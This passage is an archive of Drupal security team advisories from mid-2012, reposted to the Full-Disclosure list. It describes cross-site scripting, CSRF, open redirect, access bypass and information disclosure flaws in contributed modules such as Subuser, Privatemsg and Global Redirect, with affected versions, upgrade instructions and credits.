[3] module, there is nothing you need to do. SOLUTION Install the latest version: * If you use the Location Search (Location sub-module) module for Drupal 6.x, upgrade to Location 6.x-3.2 [4] * If you use the Location Search (Location sub-module) module for Drupal 7.x, upgrade to Location 7.x-3.0-alpha1 [5] Also see the Location [6] project page. REPORTED BY - * Jon Daley [7] FIXED BY * Reuben Turk [8] the module maintainer * Ankur Rishi [9] the module maintainer COORDINATED BY -- * Greg Knaddison [10] of the Drupal Security Team * Ben Jeavons [11] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [12]. Learn more about the Drupal Security team and their policies [13], writing secure code for Drupal [14], and securing your site [15]. [1] http://drupal.org/project/location [2] http://drupal.org/security-team/risk-levels [3] http://drupal.org/project/location [4] http://drupal.org/node/1699962 [5] http://drupal.org/node/1699984 [6] http://drupal.org/project/location [7] http://drupal.org/user/586142 [8] http://drupal.org/user/350381 [9] http://drupal.org/user/11703 [10] http://drupal.org/user/36762 [11] http://drupal.org/user/91990 [12] http://drupal.org/contact [13] http://drupal.org/security-team [14] http://drupal.org/writing-secure-code [15] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2012-116 - Subuser Cross Site Request Forgery (CSRF) and Access Bypass
View online: http://drupal.org/node/1700584 * Advisory ID: DRUPAL-SA-CONTRIB-2012-116 * Project: Subuser [1] (third-party module) * Version: 6.x * Date: 2012-July-25 * Security risk: Less critical [2] * Exploitable from: Remote * Vulnerability: Access bypass, Cross Site Request Forgery DESCRIPTION - The Subuser module allows users to be given the permission to create subusers. The subusers may then be automatically assigned a role or roles. The parent user then has the ability to manage the subusers they have created. A parent user is allowed to assume the role of a subuser they created (switch users) without having the "switch subuser" permission. However, users are prevented from switching to subusers that were not created by them. Additionally users can be switched to a subuser without intending to do so via a Cross Site Request Forgery attack (CSRF). CVE: Requested VERSIONS AFFECTED --- * subuser 6.x-1.x versions prior to 6.x-1.8. Drupal core is not affected. If you do not use the contributed Subuser [3] module, there is nothing you need to do. SOLUTION Install the latest version: * If you use the Subuser module for Drupal 6.x, upgrade to Subuser 6.x-1.8 [4] Also see the Subuser [5] project page. REPORTED BY - * Stella Power [6] of the Drupal Security Team FIXED BY * Jimmy Berry [7] the module maintainer * Lee Rowlands [8] COORDINATED BY -- * Stella Power [9] of the Drupal Security Team * Greg Knaddison [10] of the Drupal Security Team * Michael hess [11] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [12]. Learn more about the Drupal Security team and their policies [13], writing secure code for Drupal [14], and securing your site [15]. [1] http://drupal.org/project/subuser [2] http://drupal.org/security-team/risk-levels [3] http://drupal.org/project/subuser [4] http://drupal.org/node/1700550 [5] http://drupal.org/project/subuser [6] http://drupal.org/user/66894 [7] http://drupal.org/user/214218 [8] http://drupal.org/user/395439 [9] http://drupal.org/user/66894 [10] http://drupal.org/user/36762 [11] http://drupal.org/user/102818 [12] http://drupal.org/contact [13] http://drupal.org/security-team [14] http://drupal.org/writing-secure-code [15] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2012-115 - Gallery formatter - Cross Site Scripting (XSS)
View online: http://drupal.org/node/1700578 * Advisory ID: DRUPAL-SA-CONTRIB-2012-115 * Project: Gallery formatter [1] (third-party module) * Version: 7.x * Date: 2012-July-25 * Security risk: Moderately critical [2] * Exploitable from: Remote * Vulnerability: Cross Site Scripting DESCRIPTION - Gallery formatter provides a field formatter for images that turns the fields into jQuery galleries. The module did not properly escape input from the user before printing it to the browser, allowing malicious users to inject script code into the page. This vulnerability is mitigated by the fact that an attacker must have a role with the permission to create the nodes / entities and the fields that use the formatter. CVE: Requested VERSIONS AFFECTED --- * Gallery formatter 7.x-1.x versions prior to 7.x-1.2. Drupal core is not affected. If you do not use the contributed Gallery formatter [3] module, there is nothing you need to do. SOLUTION Install the latest version: * If you use the Gallery formatter module for Drupal 7.x, upgrade to Gallery formatter 7.x-1.2 [4] Also see the Gallery formatter [5] project page. REPORTED BY - * Sudipta Bandyopadhyay [6] FIXED BY * Manuel Garcia [7] the module maintainer COORDINATED BY -- * Greg Knaddison [8] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [9]. Learn more about the Drupal Security team and their policies [10], writing secure code for Drupal [11], and securing your site [12]. [1] http://drupal.org/project/galleryformatter [2] http://drupal.org/security-team/risk-levels [3] http://drupal.org/project/galleryformatter [4] http://drupal.org/node/1699744 [5] http://drupal.org/project/galleryformatter [6] http://drupal.org/user/140596 [7] http://drupal.org/user/213194 [8] http://drupal.org/user/36762 [9] http://drupal.org/contact [10] http://drupal.org/security-team [11] http://drupal.org/writing-secure-code [12] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2012-114 - Campaign Monitor - Cross Site Scripting (XSS)
View online: http://drupal.org/node/1691446 * Advisory ID: SA-CONTRIB-2012-114 * Project: Campaign Monitor [1] (third-party module) * Version: 6.x * Date: 2012-July-18 * Security risk: Moderately critical [2] * Exploitable from: Remote * Vulnerability: Cross Site Scripting DESCRIPTION - This module enables you to integrate Campaign Monitor into Drupal so you can give users the ability to subscribe and unsubscribe for your Campaign Monitor lists. The module doesn't sufficiently validate strings entered in the administration interface. This vulnerability is mitigated by the fact that an attacker must have a role with the permission "administer campaignmonitor". CVE: Requested VERSIONS AFFECTED --- * Campaign Monitor 6.x-2.x versions prior to 6.x-2.5 Drupal core is not affected. If you do not use the contributed Campaign Monitor [3] module, there is nothing you need to do. SOLUTION Install the latest version: * If you use the Campaign Monitor module for Drupal 6.x, upgrade to Campaign Monitor 6.x-2.5 [4] Also see the Campaign Monitor [5] project page. REPORTED BY - * Andrey Tretyakov [6] FIXED BY * Jesper Kristensen [7] the module maintainer COORDINATED BY -- * Greg Knaddison [8] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [9]. Learn more about the Drupal Security team and their policies [10], writing secure code for Drupal [11], and securing your site [12]. [1] http://drupal.org/project/campaignmonitor [2] http://drupal.org/security-team/risk-levels [3] http://drupal.org/project/campaignmonitor [4] http://drupal.org/node/1689790 [5] http://drupal.org/project/campaignmonitor [6] http://drupal.org/user/169459 [7] http://drupal.org/user/697210 [8] http://drupal.org/user/36762 [9] http://drupal.org/contact [10] http://drupal.org/security-team [11] http://drupal.org/writing-secure-code [12] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2012-104 - Privatemsg - Cross Site Scripting (XSS)
View online: http://drupal.org/node/1649346 * Advisory ID: DRUPAL-SA-CONTRIB-2012-104 * Project: Privatemsg [1] (third-party module) * Version: 7.x * Date: 2012-June-20 * Security risk: Moderately critical [2] * Exploitable from: Remote * Vulnerability: Cross Site Scripting DESCRIPTION - The Privatemsg module allows users to send private messages between to each other. The module doesn't sufficiently sanitize user names when creating messages. This vulnerability is mitigated by the fact that it is not possible to create insecure user names through the default user interface. The exploit is only possible in combination with another module that allows this, such as Realname [3] which allows site-builders to choose fields to display an alternative username. CVE: Requested VERSIONS AFFECTED --- * Privatemsg 7.x-1.x versions prior to 7.x-1.3 Drupal core is not affected. If you do not use the contributed Privatemsg [4] module, there is nothing you need to do. SOLUTION Install the latest version: * If you use the Privatemsg module for Drupal 7, upgrade to Privatemsg 7.x-1.3 [5] Also see the Privatemsg [6] project page. REPORTED BY - * Dave Reid [7] of the Drupal Security Team FIXED BY * Sascha Grossenbacher [8] the module maintainer COORDINATED BY -- * Dave Reid [9] of the Drupal Security Team * Greg Knaddison [10] of the Drupal Security Team * Michael Hess [11] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [12]. Learn more about the Drupal Security team and their policies [13], writing secure code for Drupal [14], and securing your site [15]. [1] http://drupal.org/project/privatemsg [2] http://drupal.org/security-team/risk-levels [3] http://drupal.org/project/realname [4] http://drupal.org/project/privatemsg [5] http://drupal.org/node/1649338 [6] http://drupal.org/project/privatemsg [7] http://drupal.org/user/53892 [8] http://drupal.org/user/214652 [9] http://drupal.org/user/53892 [10] http://drupal.org/user/36762 [11] http://drupal.org/user/102818 [12] http://drupal.org/contact [13] http://drupal.org/security-team [14] http://drupal.org/writing-secure-code [15] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2012-103 - Global Redirect - Open Redirect
View online: http://drupal.org/node/1633054 * Advisory ID: DRUPAL-SA-CONTRIB-2012-103 * Project: Global Redirect [1] (third-party module) * Version: 6.x, 7.x * Date: 2012-June-13 * Security risk: Less critical [2] * Exploitable from: Remote * Vulnerability: Open Redirect DESCRIPTION - This module improves SEO and usability of a site by redirecting visitors to user-friendly and search-engine-friendly URLs. The module does not sufficiently validate that a destination URL is internal to the site, allowing an attacker to disguise a malicious destination address as a query parameter passed to a legitimate site URL. This vulnerability is mitigated by the fact that a site must have the "non-clean to clean" redirect enabled; however, this is the default configuration. CVE: Requested VERSIONS AFFECTED --- * Global Redirect 6.x-1.x versions prior to 6.x-1.4. * Global Redirect 7.x-1.x versions prior to 7.x-1.4. Drupal core is not affected. If you do not use the contributed Global Redirect [3] module, there is nothing you need to do. SOLUTION Install the latest version: * If you use the Global Redirect module for Drupal 6.x, upgrade to Global Redirect 6.x-1.4 [4] * If you use the Global Redirect module for Drupal 7.x, upgrade to Global Redirect 7.x-1.4 [5] Also see the Global Redirect [6] project page. REPORTED BY - * Ben Johnson [7] (benpjohnson) * Justin Klein-Keane [8] (Justin_KleinKeane) * Joe Chambers [9] (myrapunzeled) FIXED BY * Nicholas Thompson [10] the module maintainer * Dave Reid [11] of the Drupal Security Team COORDINATED BY -- * Greg Knaddison [12] of the Drupal Security Team * Dave Reid [13] of the Drupal Security Team * Michael Hess [14] of the Drupal Security Team * Dylan Tack [15] of the Drupal Security Team * David Rothstein [16] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [17]. Learn more about the Drupal Security team and their policies [18], writing secure code for Drupal [19], and securing your site [20]. [1] http://drupal.org/project/globalredirect [2] http://drupal.org/security-team/risk-levels [3] http://drupal.org/project/globalredirect [4] https://drupal.org/node/1378116 [5] https://drupal.org/node/1378118 [6] http://drupal.org/project/globalredirect [7] http://drupal.org/user/268889 [8] http://drupal.org/user/302225 [9] http://drupal.org/user/1228542 [10] http://drupal.org/user/59351 [11] http://drupal.org/user/53892 [12] http://drupal.org/user/36762 [13] http://drupal.org/user/53892 [14] http://drupal.org/user/102818 [15] http://drupal.org/user/96647 [16] http://drupal.org/user/124982 [17] http://drupal.org/contact [18] http://drupal.org/security-team [19] http://drupal.org/writing-secure-code [20] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2012-102 - Ubercart AJAX Cart - Potential Disclosure of user Session ID
View online: http://drupal.org/node/1633048 * Advisory ID: DRUPAL-SA-CONTRIB-2012-102 * Project: Ubercart AJAX Cart [1] (third-party module) * Version: 6.x * Date: 2012-June-13 * Security risk: Less critical [2] * Exploitable from: Remote * Vulnerability: Information Disclosure DESCRIPTION - This module enables you to replace the default Ubercart shopping cart block with an AJAX-enabled one. The module includes the user's current session ID in one of its JavaScript settings keys on every page load which could be intercepted if the user's connection is not over SSL. This vulnerability is mitigated by the fact that an attacker must gain read access to the HTML output of a page with the uc_ajax_cart block enabled in order to potentially hijack the user's session. The issue is only known to affect sites that use some additional form of caching for authenticated users that shares Javascript settings values which is not a common case. CVE: Requested VERSIONS AFFECTED --- * uc_ajax_cart 6.x-2.x versions prior to 6.x-2.1. Drupal core is not affected. If you do not use the contributed Ubercart AJAX Cart [3] module, there is nothing you need to do. SOLUTION Install the latest version: * If you use the uc_ajax_cart module for Drupal 6.x, upgrade to uc_ajax_cart 6.x-2.1 [4] Also see the Ubercart AJAX Cart [5] project page. REPORTED BY - * Neil Bertram [6] FIXED BY * Stewart Adam [7], the module maintainer * Gerhard Killesreiter [8] of the Drupal Security Team COORDINATED BY -- * Greg Knaddison [9] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [10]. Learn more about the Drupal Security team and their policies [11], writing secure code for Drupal [12], and securing your site [13]. [1] http://drupal.org/project/uc_ajax_cart [2] http://drupal.org/security-team/risk-levels [3] http://drupal.org/project/uc_ajax_cart [4] http://drupal.org/node/1619586 [5] http://drupal.org/project/uc_ajax_cart [6] http://drupal.org/user/154713 [7] http://drupal.org/user/586244 [8] http://drupal.org/user/83 [9] http://drupal.org/user/36762 [10] http://drupal.org/contact [11] http://drupal.org/security-team [12] http://drupal.org/writing-secure-code [13] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2012-101 - Protected Node - Access Bypass
View online: http://drupal.org/node/1632918 * Advisory ID: DRUPAL-SA-CONTRIB-2012-101 * Project: Protected node [1] (third-party module) * Version: 6.x * Date: 2012-June-13 * Security risk: Moderately critical [2] * Exploitable from: Remote * Vulnerability: Access bypass DESCRIPTION - The Protected Node module enables users to use a password to restrict access to an individual node or all nodes of a node type. The module doesn't sufficiently protect node access when nodes are accessed outside of the standard node view (i.e. node/1 is protected but other lists are not). CVE: Requested VERSIONS AFFECTED --- * Protected node 6.x-1.x versions prior to 6.x-1.6. Drupal core is not affected. If you do not use the contributed Protected node [3] module, there is nothing you need to do. SOLUTION Install the latest version: * If you use the Protected node module for Drupal 6.x, upgrade to Protected node 6.x-1.6 [4] Also see the Protected node [5] project page. REPORTED BY - * Martin Barbella [6] FIXED BY * Alexis Wilke [7] the module maintainer COORDINATED BY -- * Greg Knaddison [8] of the Drupal Security Team * Michael Hess [9] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [10]. Learn more about the Drupal Security team and their policies [11], writing secure code for Drupal [12], and securing your site [13]. [1] http://drupal.org/project/protected_node [2] http://drupal.org/security-team/risk-levels [3] http://drupal.org/project/protected_node [4] http://drupal.org/node/1258034 [5] http://drupal.org/project/protected_node [6] http://drupal.org/user/633600 [7] http://drupal.org/user/356197 [8] http://drupal.org/user/36762 [9] http://drupal.org/user/102818 [10] http://drupal.org/contact [11] http://drupal.org/security-team [12] http://drupal.org/writing-secure-code [13] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2012-100 - SimpleMeta - Cross Site Request Forgery (CSRF)
View online: http://drupal.org/node/1632908 * Advisory ID: DRUPAL-SA-CONTRIB-2012-100 * Project: SimpleMeta [1] (third-party module) * Version: 6.x * Date: 2012-June-13 * Security risk: Moderately critical [2] * Exploitable from: Remote * Vulnerability: Cross Site Request Forgery DESCRIPTION - The Simple Meta module provides a method to set meta tags, such as page title, description and keywords for nodes, views and other pages. The module doesn't sufficiently confirm user intent when adding and deleting meta tag entries allowing a malicious user to trick a site admin into deleting entries or adding inappropriate entries. CVE: Requested VERSIONS AFFECTED --- * Simple meta 6.x-1.x all versions prior to 6.x-2.0. Drupal core is not affected. If you do not use the contributed SimpleMeta [3] module, there is nothing you need to do. SOLUTION Install the latest version: * If you use the Simple meta module for Drupal 6.x, upgrade to Simple meta 6.x-2.0 [4] The 6.x-1.x branch is no longer supported and all users of that branch should upgrade to the 6.x-2.x code. Also see the SimpleMeta [5] project page. REPORTED BY - * Nicholas Thompson [6] FIXED BY * Alexander [7] the module maintainer COORDINATED BY -- * Greg Knaddison [8] of the Drupal Security Team * Michael Hess [9] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [10]. Learn more about the Drupal Security team and their policies [11], writing secure code for Drupal [12], and securing your site [13]. [1] http://drupal.org/project/simplemeta [2] http://drupal.org/security-team/risk-levels [3] http://drupal.org/project/simplemeta [4] http://drupal.org/node/1534874 [5] http://drupal.org/project/simplemeta [6] http://drupal.org/user/59351 [7] http://drupal.org/user/366450 [8] http://drupal.org/user/36762 [9] http://drupal.org/user/102818 [10] http://drupal.org/contact [11] http://drupal.org/security-team [12] http://drupal.org/writing-secure-code [13] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2012-099 - Node Hierarchy - Cross Site Request Forgery (CSRF)
View online: http://drupal.org/node/1632900 * Advisory ID: DRUPAL-SA-CONTRIB-2012-099 * Project: Node Hierarchy [1] (third-party module) * Version: 6.x * Date: 2012-June-13 * Security risk: Moderately critical [2] * Exploitable from: Remote * Vulnerability: Cross Site Request Forgery DESCRIPTION - Node Hierarchy module allows for the creation of parent child relationships among nodes that can create a tree-like hierarchy of content. The module doesn't sufficiently confirm user intent when reordering children nodes allowing a malicious user to trick a site admin to changing the desired hierarchy. CVE: Requested VERSIONS AFFECTED --- * Node Hierarchy 6.x-1.x versions prior to 6.x-1.5. Drupal core is not affected. If you do not use the contributed Node Hierarchy [3] module, there is nothing you need to do. SOLUTION Install the latest version: * If you use the Node Hierarchy module for Drupal 6.x, upgrade to Node Hierarchy 6.x-1.5 [4] Also see the Node Hierarchy [5] project page. REPORTED BY - * Dylan Tack [6] of the Drupal Security Team FIXED BY * Ronan Dowling [7] the module maintainer COORDINATED BY -- * Greg Knaddison [8] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [9]. Learn more about the Drupal Security team and their policies [10], writing secure code for Drupal [11], and securing your site [12]. [1] http://drupal.org/project/nodehierarchy [2] http://drupal.org/security-team/risk-levels [3] http://drupal.org/project/nodehierarchy [4] http://drupal.org/node/1632432 [5] http://drupal.org/project/nodehierarchy [6] http://drupal.org/user/96647 [7] http://drupal.org/user/72815 [8] http://drupal.org/user/36762 [9] http://drupal.org/contact [10] http://drupal.org/security-team [11] http://drupal.org/writing-secure-code [12] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2012-098 - Janrain Capture - Open Redirect
View online: http://drupal.org/node/1632734 * Advisory ID: DRUPAL-SA-CONTRIB-2012-098 * Project: Janrain Capture [1] (third-party module) * Version: 6.x, 7.x * Date: 2012-June-13 * Security risk: Less critical [2] * Exploitable from: Remote * Vulnerability: Open Redirect DESCRIPTION - This module allows for authentication through the cloud user-management platform Janrain Capture. Part of the module exposes an endpoint to re-synchronize user data between Drupal and Capture and allows for passing an optional parameter to redirect the user back to an original location. This parameter was not checked to verify that it's an internal path, possibly leading to an open redirect vulnerability if the user was tricked into accessing the authentication workflow via a specially crafted URL. An additional security weakness occurs when the module creates a new local user account. The input to the generated password should be unguessable, but could be partially discovered. For sites that allow both local and Capture logins, this could lead to easy brute-force guessing of the local password. CVE: Requested VERSIONS AFFECTED --- * Janrain Capture 6.x-1.0 * Janrain Capture 7.x-1.0 Drupal core is not affected. If you do not use the contributed Janrain Capture [3] module, there is nothing you need to do. SOLUTION Install the latest version: * If you use the Janrain Capture module for Drupal 6.x, upgrade to Janrain Capture 6.x-1.1 [4] or later * If you use the Janrain Capture module for Drupal 7.x, upgrade to Janrain Capture 7.x-1.1 [5] or later If you are using this module and allow local logins, you may wish to regenerate the "random" local user passwords. Also see the Janrain Capture [6] project page. REPORTED BY - * Peter Wolanin [7] of the Drupal Security Team FIXED BY * Bryce Hamrick [8] the module maintainer COORDINATED BY -- * Peter Wolanin [9] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [10]. Learn more about the Drupal Security team and their policies [11], writing secure code for Drupal [12], and securing your site [13]. [1] http://drupal.org/project/janrain_capture [2] http://drupal.org/security-team/risk-levels [3] http://drupal.org/project/janrain_capture [4] http://drupal.org/node/1632704 [5] http://drupal.org/node/1632702 [6] http://drupal.org/project/janrain_capture [7] http://drupal.org/user/49851 [8] http://drupal.org/user/1350078 [9] http://drupal.org/user/49851 [10] http://drupal.org/contact [11] http://drupal.org/security-team [12] http://drupal.org/writing-secure-code [13] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2012-097 - Protest - Cross Site Scripting (XSS)
View online: http://drupal.org/node/1619856 * Advisory ID: DRUPAL-SA-CONTRIB-2012-097 * Project: Protest [1] (third-party module) * Version: 6.x, 7.x * Date: 2012-June-06 * Security risk: Moderately critical [2] * Exploitable from: Remote * Vulnerability: Cross Site Scripting DESCRIPTION - Protest allows websites to display a complete page blackout (website protest). The module contains a cross site scripting (XSS) vulnerability as it fails to sanitize user input before display. This vulnerability is mitigated by the fact that an attacker must have a role with the permission "administer protest". CVE: Requested VERSIONS AFFECTED --- * Protest 6.x-1.x versions prior to 6.x-1.2. * Protest 7.x-1.x versions prior to 7.x-1.2. Drupal core is not affected. If you do not use the contributed Protest [3] module, there is nothing you need to do. SOLUTION Install the latest version: * If you use the Protest module for Drupal 6.x, upgrade to Protest 6.x-1.2 [4] * If you use the Protest module for Drupal 7.x, upgrade to Protest 7.x-1.2 [5] Also see the Protest [6] project page. REPORTED BY - * Shawn Price [7] FIXED BY * Shawn Price [8] the module maintainer COORDINATED BY -- * Greg Knaddison [9] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [10]. Learn more about the Drupal Security team and their policies [11], writing secure code for Drupal [12], and securing your site [13]. [1] http://drupal.org/project/protest [2] http://drupal.org/security-team/risk-levels [3] http://drupal.org/project/protest [4] http://drupal.org/node/1618090 [5] http://drupal.org/node/1618092 [6] http://drupal.org/project/protest [7] http://drupal.org/user/25556 [8] http://drupal.org/user/25556 [9] http://drupal.org/user/36762 [10] http://drupal.org/contact [11] http://drupal.org/security-team [12] http://drupal.org/writing-secure-code [13] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2012-096 - Authoring HTML - Cross Site Scripting (XSS)
View online: http://drupal.org/node/1619852 * Advisory ID: DRUPAL-SA-CONTRIB-2012-096 * Project: Authoring HTML [1] (third-party module) * Version: 6.x * Date: 2012-June-06 * Security risk: Moderately critical [2] * Exploitable from: Remote * Vulnerability: Cross Site Scripting DESCRIPTION - This module creates an input format suitable for use within a WYSIWYG editor. It adds support for the iframe HTML tag, making it friendly with the popular iframe embeds available in popular video sites like YouTube and Vimeo. It supports the script tag too. Both tags will only be allowed if the referred URL is whitelisted. By default, you can refer some well known video sites in the iframe tag and any site with the tag. The module doesn't sufficiently verify the whitelisted hosts. This allows an attacker to register and use a malicious host, bypassing verification. This vulnerability is mitigated by the fact that an attacker must have a role authorized to use the "Authoring HTML" input format. CVE: Requested VERSIONS AFFECTED --- * Authoring HTML 6.x-1.x versions prior to 6.x-1.1. Drupal core is not affected. If you do not use the contributed Authoring HTML [3] module, there is nothing you need to do. SOLUTION Install the latest version: * If you use the Authoring HTML module for Drupal 6.x, upgrade to Authoring HTML 6.x-1.1 [4] Also see the Authoring HTML [5] project page. REPORTED BY - * Eriksen Costa [6] the module maintainer FIXED BY * Eriksen Costa [7] the module maintainer * Matt Chapman [8] of the Drupal Security Team COORDINATED BY -- * Matt Chapman [9] of the Drupal Security Team * Greg Knaddison [10] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [11]. Learn more about the Drupal Security team and their policies [12], writing secure code for Drupal [13], and securing your site [14]. [1] http://drupal.org/project/authoring_html [2] http://drupal.org/security-team/risk-levels [3] http://drupal.org/project/authoring_html [4] http://drupal.org/node/1619086 [5] http://drupal.org/project/authoring_html [6] http://drupal.org/user/215266 [7] http://drupal.org/user/215266 [8] http://drupal.org/user/143172 [9] http://drupal.org/user/143172 [10] http://drupal.org/user/36762 [11] http://drupal.org/contact [12] http://drupal.org/security-team [13] http://drupal.org/writing-secure-code [14] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2012-095 - Simplenews - Information Disclosure
View online: http://drupal.org/node/1619848 * Advisory ID: DRUPAL-SA-CONTRIB-2012-095 * Project: Simplenews [1] (third-party module) * Version: 6.x, 7.x * Date: 2012-June-06 * Security risk: Moderately critical [2] * Exploitable from: Remote * Vulnerability: Information Disclosure DESCRIPTION - Simplenews publishes and sends newsletters. When subscribing to a Simplenews mailing list, confirmation may be required, and Simplenews may disclose the user's e-mail address on the confirmation page. Further, due to the absence of a noindex tag, the list of e-mail addresses can subsequently be indexed by search engines. CVE: Requested VERSIONS AFFECTED --- * Simplenews 6.x-1.x versions prior to 6.x-1.4 * Simplenews 6.x-2.x versions prior to 6.x-2.0-alpha4 * Simplenews 7.x-1.x versions prior to 7.x-1.0-rc1 Drupal core is not affected. If you do not use the contributed Simplenews [3] module, there is nothing you need to do. SOLUTION Install the latest version: * If you use the Simplenews module for Drupal 6.x, upgrade to Simplenews 6.x-1.4 [4] or Simplenews 6.x-2.0-alpha4 [5] * If you use the Simplenews module for Drupal 7.x, upgrade to Simplenews 7.x-1.0-rc1 [6] Also see the Simplenews [7] project page. REPORTED BY - * Laza [8] * Sascha Grossenbacher [9] the module maintainer FIXED BY * Sascha Grossenbacher [10] the module maintainer * Dave Reid [11] of the Drupal Security Team COORDINATED BY -- * Dave Reid [12] of the Drupal Security Team * Greg Knaddison [13] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [14]. Learn more about the Drupal Security team and their policies [15], writing secure code for Drupal [16], and securing your site [17]. [1] http://drupal.org/project/simplenews [2] http://drupal.org/security-team/risk-levels [3] http://drupal.org/project/simplenews [4] http://drupal.org/node/1619812 [5] http://drupal.org/node/1619818 [6] http://drupal.org/node/1619820 [7] http://drupal.org/project/simplenews [8] http://drupal.org/user/145993 [9] http://drupal.org/user/214652 [10] http://drupal.org/user/214652 [11] http://drupal.org/user/53892 [12] http://drupal.org/user/53892 [13] http://drupal.org/user/36762 [14] http://drupal.org/contact [15] http://drupal.org/security-team [16] http://drupal.org/writing-secure-code [17] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2012-094 - Maestro module - Cross Site Request Forgery (CSRF), Cross Site Scripting (XSS)
